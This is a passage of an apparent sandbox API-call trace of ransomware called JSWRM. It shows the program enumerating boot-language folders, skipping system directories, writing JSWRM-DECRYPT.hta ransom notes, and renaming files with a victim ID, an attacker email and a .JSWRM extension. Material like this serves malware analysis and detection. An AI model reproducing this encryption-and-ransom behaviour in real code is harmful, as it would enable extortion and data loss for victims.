cAlternateFileName="")) returned 1 [0063.887] lstrcmpiW (lpString1="fr-CA", lpString2=".") returned 1 [0063.887] lstrcmpiW (lpString1="fr-CA", lpString2="..") returned 1 [0063.887] lstrcmpiW (lpString1="fr-CA", lpString2="...") returned 1 [0063.887] lstrcmpiW (lpString1="fr-CA", lpString2="windows") returned -1 [0063.887] lstrcmpiW (lpString1="fr-CA", lpString2="recovery") returned -1 [0063.887] lstrcmpiW (lpString1="fr-CA", lpString2="perflogs") returned -1 [0063.887] lstrcmpiW (lpString1="fr-CA", lpString2="documents and settings") returned 1 [0063.887] lstrcmpiW (lpString1="fr-CA", lpString2="$RECYCLE.BIN") returned 1 [0063.887] lstrcmpiW (lpString1="fr-CA", lpString2="system volume information") returned -1 [0063.887] lstrcmpiW (lpString1="fr-CA", lpString2="msocache") returned -1 [0063.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0063.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0063.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0063.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237538 [0063.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.888] GetFileAttributesW (lpFileName="C:\\Boot\\fr-CA\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\fr-ca\\jswrm-decrypt.hta")) returned 0xffffffff [0063.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237538 | out: hHeap=0x1e0000) returned 1 [0063.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0063.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0063.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0063.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0063.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0063.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236fe8 [0063.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.889] CreateFileW (lpFileName="C:\\Boot\\fr-CA\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\fr-ca\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0063.889] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0063.889] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0063.890] CloseHandle (hObject=0x450) returned 1 [0063.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236fe8 | out: hHeap=0x1e0000) returned 1 [0063.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0063.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0063.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0063.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0063.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x2373f8 [0063.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.892] GetFileAttributesW (lpFileName="C:\\Boot\\fr-CA\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\fr-ca\\jswrm-decrypt.hta")) returned 0x20 [0063.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2373f8 | out: hHeap=0x1e0000) returned 1 [0063.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0063.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.892] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-CA\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x1cbdc8af, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231f40 [0063.892] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.892] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x1cbdc8af, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0063.892] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.892] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.892] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0063.892] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0063.892] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0063.892] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0063.892] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0063.892] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0063.893] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0063.893] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0063.893] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0063.893] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0063.893] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0063.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0063.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0063.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0063.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0063.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.893] CreateFileW (lpFileName="C:\\Boot\\fr-CA\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.893] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9251806234337896) returned 0 [0063.893] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.894] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.894] CloseHandle (hObject=0xffffffff) returned 1 [0063.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0063.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0063.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0063.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2268b0 [0063.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0063.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0063.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2268b0 | out: hHeap=0x1e0000) returned 1 [0063.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.895] MoveFileW (lpExistingFileName="C:\\Boot\\fr-CA\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\fr-CA\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0063.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.895] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cbdc8af, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cbdc8af, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cbdc8af, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0063.895] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0063.895] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0063.895] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0063.895] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0063.895] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0063.895] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0063.895] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0063.895] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0063.895] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0063.895] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0063.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0063.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241358, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0063.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0063.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0063.896] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cbdc8af, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cbdc8af, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cbdc8af, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0063.896] FindClose (in: hFindFile=0x231f40 | out: hFindFile=0x231f40) returned 1 [0063.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0063.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0063.896] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010bc12, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ade2b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0063.896] lstrcmpiW (lpString1="fr-FR", lpString2=".") returned 1 [0063.896] lstrcmpiW (lpString1="fr-FR", lpString2="..") returned 1 [0063.896] lstrcmpiW (lpString1="fr-FR", lpString2="...") returned 1 [0063.896] lstrcmpiW (lpString1="fr-FR", lpString2="windows") returned -1 [0063.896] lstrcmpiW (lpString1="fr-FR", lpString2="recovery") returned -1 [0063.896] lstrcmpiW (lpString1="fr-FR", lpString2="perflogs") returned -1 [0063.896] lstrcmpiW (lpString1="fr-FR", lpString2="documents and settings") returned 1 [0063.896] lstrcmpiW (lpString1="fr-FR", lpString2="$RECYCLE.BIN") returned 1 [0063.896] lstrcmpiW (lpString1="fr-FR", lpString2="system volume information") returned -1 [0063.896] lstrcmpiW (lpString1="fr-FR", lpString2="msocache") returned -1 [0063.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0063.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0063.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0063.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x2373a8 [0063.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.897] GetFileAttributesW (lpFileName="C:\\Boot\\fr-FR\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\fr-fr\\jswrm-decrypt.hta")) returned 0xffffffff [0063.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2373a8 | out: hHeap=0x1e0000) returned 1 [0063.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0063.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0063.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0063.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0063.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0063.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237038 [0063.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.897] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\fr-fr\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0063.898] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0063.898] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0063.900] CloseHandle (hObject=0x450) returned 1 [0063.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237038 | out: hHeap=0x1e0000) returned 1 [0063.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0063.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0063.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0063.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0063.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0063.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236d68 [0063.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0063.902] GetFileAttributesW (lpFileName="C:\\Boot\\fr-FR\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\fr-fr\\jswrm-decrypt.hta")) returned 0x20 [0063.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236d68 | out: hHeap=0x1e0000) returned 1 [0063.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0063.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.902] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010bc12, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1cc02d1c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231bc0 [0063.902] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.902] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010bc12, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1cc02d1c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 